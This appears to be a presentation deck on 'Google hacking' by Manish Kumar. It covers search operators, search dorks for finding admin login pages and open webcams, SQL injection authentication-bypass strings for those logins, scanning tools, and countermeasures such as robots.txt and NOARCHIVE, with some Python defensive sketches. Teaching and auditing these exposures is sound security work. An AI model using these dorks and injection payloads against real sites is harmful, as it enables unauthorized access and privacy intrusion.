Google and Beyond: Advanced Search Engine Hacking and Web-Based Intelligence Gathering By Manish Kumar Founder & CEO, Rooman Technologies Pvt Ltd
AGENDA • How Google works • Information disclosure with Google • Tools • Countermeasures
Google Hacking • Web Hacking: Pick a site, find the vulnerability. • Google Hacking: Pick a vulnerability, find the site. • Don’t be a target of opportunity.
How Google Works • Googlebot: a web crawler that finds and fetches web pages. • The indexer: sorts every word on every page and stores the resulting index of words in a huge database. • The query processor: compares your search query to the index and recommends the documents that it considers most relevant.
How Google Works • [Diagram: client side and server side]
How Googlebot Works Googlebot finds pages in two ways • through an add URL form, www.google.com/addurl.html • through finding links by crawling the web.
Indexer and Query Processor • Indexer • Googlebot gives the indexer the full text of the pages it finds. These pages are stored in Google’s index database. • The index is sorted alphabetically by search term; each index entry stores a list of documents in which the term appears and the location within the text where it occurs. • Query Processor • Page ranking puts more important pages at a higher rank. • Intelligent techniques for learning relationships and associations within the stored data • Spelling-correction system
So What Determines Page Relevance and Rating? • Exact Phrase: • are your keywords found as an exact phrase in any pages? • Adjacency: • how close are your keywords to each other? • Weighting: • how many times do the keywords appear in the page? • PageRank/Links: • How many links point to the page? How many links are actually in the page? • Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)
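The indexer described above can be pictured as an inverted index: a map from each term to the documents that contain it and the word positions where it occurs. The following is a minimal sketch of that idea, not Google's implementation; the function names `build_index` and `lookup` and the sample pages are assumptions made for illustration.

```python
from collections import defaultdict


def build_index(pages):
    """Build a term -> {url: [word positions]} inverted index.

    `pages` maps a URL to its full text (hypothetical sample data).
    """
    index = defaultdict(lambda: defaultdict(list))
    for url, text in pages.items():
        for position, word in enumerate(text.lower().split()):
            index[word][url].append(position)
    return index


def lookup(index, term):
    """Return the documents and positions recorded for a single term."""
    postings = index.get(term.lower(), {})
    return {url: list(positions) for url, positions in postings.items()}


pages = {
    "a.html": "auto insurance quote",
    "b.html": "Insurance for auto owners",
}
index = build_index(pages)
print(sorted(index))               # terms in alphabetical order
print(lookup(index, "insurance"))  # documents and positions for one term
```

A query processor would then combine the postings of several terms, for example checking whether positions are adjacent to detect an exact phrase.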
The Basics • To set the stage for what I will demo, it is necessary to understand some of Google’s advanced search functions. • This will not be an exhaustive list, just an intro. • Creative use of these functions is the key to successful Google Hacking.
The Basics • Some important things to keep in mind • Google queries are not case sensitive. • The * wildcard represents any word • Example: “* insurance quote” • Google stems words automatically • Example: “automobile insurance quote” brings up sites with “auto … “.
The Basics • The + symbol forces inclusion of a certain word. • “auto insurance +progressive” • The - symbol forces exclusion of a certain word. • (site:progressive.com -site:www.progressive.com) • The | symbol provides boolean OR logic. • “auto insurance + inurl:(progressive | geico)”
Information Disclosure with Google • Advanced Search Operators • site: (.edu, .gov, foundstone.com, usc.edu) • filetype: (txt, xls, mdb, pdf, .log) • Daterange: (julian date format) • Intitle / allintitle • Inurl / allinurl
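The daterange: operator takes Julian day numbers rather than calendar dates. As a rough sketch, assuming the commonly documented `daterange:START-END` form, the conversion can be done with the standard library; the helper names `julian_day` and `daterange` are made up for this example.

```python
from datetime import date

# Adding this offset to date.toordinal() gives the Julian Day Number
# (2000-01-01 has ordinal 730120 and Julian Day Number 2451545).
JDN_OFFSET = 1721425


def julian_day(day):
    """Convert a calendar date to its integer Julian Day Number."""
    return day.toordinal() + JDN_OFFSET


def daterange(start, end):
    """Format a daterange: term (operator syntax assumed, see lead-in)."""
    return f"daterange:{julian_day(start)}-{julian_day(end)}"


print(daterange(date(2000, 1, 1), date(2000, 1, 31)))
```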
Advanced Operators • link:URL = lists other pages that link to the URL. • related:URL = lists other pages that are related to the URL. • site:domain.com “search term” = restricts search results to the given domain. • allinurl:WORDS = shows only pages with all search terms in the URL. • inurl:WORD = like allinurl:, but filters the URL based on the first term only. • allintitle:WORDS = shows only results with all search terms in the title. • intitle:WORD = similar to allintitle:, but applies only to the next word. • cache:URL = shows the Google cached version of the URL.
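When auditing your own domain, it helps to compose operator combinations programmatically instead of typing them by hand. The helper below is only a sketch: `build_query` and its parameters are hypothetical names, and it only assembles a query string from the operators listed above without contacting Google.

```python
def build_query(phrase=None, site=None, exclude_sites=(),
                filetype=None, intitle=None, inurl=None):
    """Assemble a search query string from common advanced operators."""
    parts = []
    if phrase:
        parts.append(f'"{phrase}"')        # exact phrase
    if site:
        parts.append(f"site:{site}")       # restrict to a domain
    for excluded in exclude_sites:
        parts.append(f"-site:{excluded}")  # drop a host from the results
    if filetype:
        parts.append(f"filetype:{filetype}")
    if intitle:
        parts.append(f"intitle:{intitle}")
    if inurl:
        parts.append(f"inurl:{inurl}")
    return " ".join(parts)


# Subdomains of a domain other than the main www host
print(build_query(site="progressive.com",
                  exclude_sites=["www.progressive.com"]))

# Directory listings on your own site (example.com is a placeholder)
print(build_query(phrase="server at", site="example.com",
                  intitle="index.of"))
```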
The Basics • Let’s take a look at a few of the interesting Google search commands.
The Basics • There are many more advanced operators. • Combining these creatively is the key to Google Hacking. • http://www.googleguide.com/advanced_operators_reference.html • BUT DO YOU REALLY NEED TO REMEMBER IT?
INTERESTING SEARCHES… Now that we’ve gotten this boring stuff out of the way, let’s introduce some Google hacks.
Google and Proxy • Use www.google.com/translate_t to bypass browser security settings. • Find a proxy that works, and enter the URL. • inurl:"nph-proxy.cgi" "start using cgiproxy" • inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"
Gaining auth bypass on an admin account • There are many Google dorks for finding admin login pages that may be open to basic SQL injection: • "inurl:admin.asp" • "inurl:login/admin.asp" • "inurl:admin/login.asp" • "inurl:adminlogin.asp" • "inurl:adminhome.asp" • "inurl:admin_login.asp" • "inurl:administratorlogin.asp" • "inurl:login/administrator.asp" • "inurl:administrator_login.asp"
SQL Injection • Keep the username as "Admin" and, for the password, type one of the following: " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- blah’ 'or'1=1' • ' or '1'='1 • ' or 'x'='x • ' or 0=0 -- • " or 0=0 -- • or 0=0 -- • ' or 0=0 # • " or 0=0 # • or 0=0 # • ' or 'x'='x • " or "x"="x • ') or ('x'='x • ' or 1=1--
A Few More Interesting Searches • Browsing images of the site • site:xxxxxxx in Google Images • Browse Live Video Cameras • inurl:"viewerframe?mode=motion" (http://22.214.171.124:555/ViewerFrame?Mode=Motion&Language=0) • intitle:"Live View / - AXIS" • Browse Open Webcams Worldwide • Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml • Canon Webcams: sample/LvAppl/ • Server versioning • intitle:index.of "server at"
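Strings like these succeed only when a login page builds its SQL by concatenating user input. The sketch below uses an in-memory SQLite database to show why, and how a parameterized query closes the hole. The table layout, the sample password, and the function names are assumptions for illustration, not taken from any real application.

```python
import sqlite3


def make_db():
    """Create a throwaway in-memory database with one admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    # Input is pasted into the SQL text, so quotes in the input can
    # change the structure of the WHERE clause.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders keep the input as data; it is never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


conn = make_db()
payload = "' or '1'='1"
print(login_vulnerable(conn, "Admin", payload))      # injection succeeds
print(login_parameterized(conn, "Admin", payload))   # injection fails
print(login_parameterized(conn, "Admin", "s3cret"))  # real password works
```

In the vulnerable version the WHERE clause becomes `username = 'Admin' AND password = '' or '1'='1'`, which is always true. A production login would also store password hashes rather than plain text; that is left out here to keep the sketch short.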
Tools • Google Hacks • Goolag Site Scanner • Site Digger • Gooscan • Goolink Scanner • Athena
GOOGLE HACK • Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services. • You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. • You can also use this program to use Google as a proxy.
GOOLAG SCANNER • Goolag Scanner enables everyone to audit his/her own web site via Google • It uses one xml-based configuration file for its settings
SITEDIGGER • Automated Google hacking tool from Foundstone • Uses Google API • Uses Google Hacking Database • SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on websites
Countermeasures • Keep sensitive data off the web! • Do not display detailed error messages. • Do not allow directory browsing. • Perform periodic Google assessments. • Update robots.txt (for examples and suggestions for using a robots.txt file, see http://www.robotstxt.org). • Use meta tags: NOARCHIVE • Request removal of content that is already indexed: http://www.google.com/remove.html
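As part of a periodic assessment, you can check that your own pages actually carry the NOARCHIVE meta tag. The following sketch uses only the standard library; the class and function names are hypothetical, and it assumes the directive is placed in a meta tag named "robots" or "googlebot".

```python
from html.parser import HTMLParser


class RobotsMetaParser(HTMLParser):
    """Collect directives from <meta name="robots" content="..."> tags."""

    def __init__(self):
        super().__init__()
        self.directives = set()

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attributes = dict(attrs)
        name = (attributes.get("name") or "").lower()
        if name in ("robots", "googlebot"):
            content = attributes.get("content") or ""
            for part in content.split(","):
                if part.strip():
                    self.directives.add(part.strip().lower())


def robots_directives(html):
    """Return the set of robots meta directives found in an HTML string."""
    parser = RobotsMetaParser()
    parser.feed(html)
    return parser.directives


page = '<html><head><meta name="ROBOTS" content="NOARCHIVE, NOINDEX"></head></html>'
print("noarchive" in robots_directives(page))
```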
How To Protect Your Websites From Google Hackers • Use a robots.txt file to prevent Google and other search engines from crawling your site if it shouldn’t be crawled.
ROBOTS.TXT Example
• This example allows all robots to visit all files because the wildcard "*" specifies all robots:
    User-agent: *
    Disallow:
• This example keeps all robots out:
    User-agent: *
    Disallow: /
• The next is an example that tells all crawlers not to enter four directories of a website:
    User-agent: *
    Disallow: /cgi-bin/
    Disallow: /images/
    Disallow: /tmp/
    Disallow: /private/
Robots.txt Cont..
• Example that tells a specific crawler not to enter one specific directory:
    User-agent: BadBot # replace the 'BadBot' with the actual user-agent of the bot
    Disallow: /private/
• Example that tells all crawlers not to enter one specific file:
    User-agent: *
    Disallow: /directory/file.html
• Note that all other files in the specified directory will be processed.
• Example demonstrating how comments can be used:
    # Comments appear after the "#" symbol at the start of a line, or after a directive
    User-agent: * # match all bots
    Disallow: / # keep them out
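Before publishing a robots.txt file, it is worth confirming that the rules do what you intend. One way, sketched here with Python's standard `urllib.robotparser` module, is to parse the rules and ask whether a given user agent may fetch a given path. The rule set and the `is_allowed` helper are illustrative assumptions that combine the examples above.

```python
from urllib.robotparser import RobotFileParser

# Sample rules combining the examples above (illustrative only)
RULES = """\
User-agent: BadBot
Disallow: /private/

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
"""


def is_allowed(rules_text, user_agent, path):
    """Return True if `user_agent` may fetch `path` under the given rules."""
    parser = RobotFileParser()
    parser.parse(rules_text.splitlines())
    return parser.can_fetch(user_agent, path)


print(is_allowed(RULES, "BadBot", "/private/report.html"))
print(is_allowed(RULES, "Googlebot", "/private/report.html"))
print(is_allowed(RULES, "Googlebot", "/tmp/cache.txt"))
```

This checks only how a well-behaved crawler would read the file; robots.txt is a request to crawlers and does not restrict access to the listed paths.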
A Few Interesting Websites • www.archive.org • Archive of websites (Time Machine) • www.readnotify.com • Find out when your email gets read; retract, certify, track, and much more • www.guerrillamail.com • Provides you with disposable e-mail addresses that expire after 15 minutes • www.gorillaemail.com • Email marketing solutions that allow you to send, track, and confirm delivery of emails, newsletters, events, etc.
QUESTIONS ???? THANK YOU Manish Kumar, CEO, Rooman Technologies Email: firstname.lastname@example.org Ph: 080-40445566